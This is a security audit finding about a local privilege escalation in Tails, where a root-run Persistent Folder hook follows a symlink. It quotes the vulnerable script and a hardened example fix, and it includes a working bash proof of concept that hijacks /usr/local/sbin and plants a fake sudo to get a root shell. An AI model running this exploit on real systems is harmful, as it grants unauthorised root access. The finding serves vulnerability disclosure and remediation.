TPS - Local Privilege Escalation (LPE) via symlinks in Persistent Folder activation hook
This is https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/3
Technical Description
local/lib/persistent-storage/on-activated-hooks/PersistentDirectory/create-persistent-tor-browser-directory
```sh
#!/bin/sh
set -e
set -u
TOR_BROWSER_PERSISTENT_DIR='/home/amnesia/Persistent/Tor Browser'
install -d -o amnesia -g amnesia -m 0700 "$TOR_BROWSER_PERSISTENT_DIR"
```
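The hook runs as root and `install -d` follows a symlink placed at the target path, so the chown/chmod lands on whatever the symlink points to. The following hardened variant is an added example (not Tails' own code or fix): it refuses symlinks, leaves any pre-existing directory's ownership and mode untouched, and creates the directory with its final mode via umask so no separate chown-then-chmod on a possibly swapped path is needed. The top-level call is guarded so it only runs as root on a system where the Persistent folder exists.

```shell
#!/bin/sh
# Hardened on-activated hook (added example, assumed layout, not Tails' code).
set -e
set -u

PERSISTENT_ROOT='/home/amnesia/Persistent'
TOR_BROWSER_PERSISTENT_DIR="$PERSISTENT_ROOT/Tor Browser"

# create_private_dir OWNER GROUP PATH
# Creates PATH as a 0700 directory owned by OWNER:GROUP only if it does not
# exist yet. Returns 0 on success or if a real directory is already there,
# 1 if PATH or its parent is a symlink, 2 if PATH exists but is not a
# directory, 3 if creation failed.
create_private_dir() {
    owner=$1; group=$2; dir=$3
    parent=$(dirname "$dir")
    # Never write through a symlink: the path lives in a user-owned tree.
    if [ -L "$parent" ] || [ -L "$dir" ]; then
        echo "refusing to operate on symlink: $dir" >&2
        return 1
    fi
    if [ -e "$dir" ]; then
        # An existing directory keeps whatever owner/mode it has; a
        # pre-existing target is never chowned or chmodded by this hook.
        [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
        return 0
    fi
    # mkdir without -p does not follow a symlink in the final component, so a
    # symlink materialised between the check and here makes mkdir fail instead
    # of being followed. umask 077 yields mode 0700 directly, no chmod needed.
    ( umask 077 && mkdir "$dir" ) || return 3
    # chown -h changes the path itself, never a symlink target.
    chown -h "$owner:$group" "$dir" || return 3
}

# Only act as the real hook would: as root, when the Persistent folder exists.
if [ "$(id -u)" -eq 0 ] && [ -d "$PERSISTENT_ROOT" ]; then
    create_private_dir amnesia amnesia "$TOR_BROWSER_PERSISTENT_DIR"
fi
```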
Impact
POC:
```bash
#!/bin/bash
# 1. Activate Persistent Folder feature
echo "Manual Step -> activate the Persistent Folder feature..";
read -n 1 -s -p "Continue? Press any char..";
# 2. Remove TOR Browser directory in the Persistent Folder
echo -e "\n-> removed the TOR Browser directory in the Persistent Folder.."
rm -rf ~/Persistent/Tor\ Browser/
# 3. Create a symlink to /sbin
echo "-> create a symlink to /sbin"
ln -sf /usr/local/sbin '/home/amnesia/Persistent/Tor Browser'
echo "Manual Step -> reactivate the Persistent Folder feature"
read -n 1 -s -p "Continue? Press any char..";
# 4. Trigger Payload -> reactivate the Persistent Folder feature (manual)
# 5. Confirm that amnesia is the owner with permissions 700 of /usr/local/sbin
echo -e "\n-> confirmed that amnesia is the owner with permissions 700 of /usr/local/sbin"
ls -la /usr/local/sbin | grep "amnesia"
# 6. Drop an attacker-controlled sudo shell script
echo "-> drop an attacker-controlled sudo shell script and make it executable.."
echo -e '#!/bin/bash\n/bin/bash' > /usr/local/sbin/sudo && chmod +x /usr/local/sbin/sudo
# 7. Get root shell
echo "-> trigger the root-shell.."
sudo /usr/local/lib/kill-boot-profile
```
Recommendation
Type
Local Privilege Escalation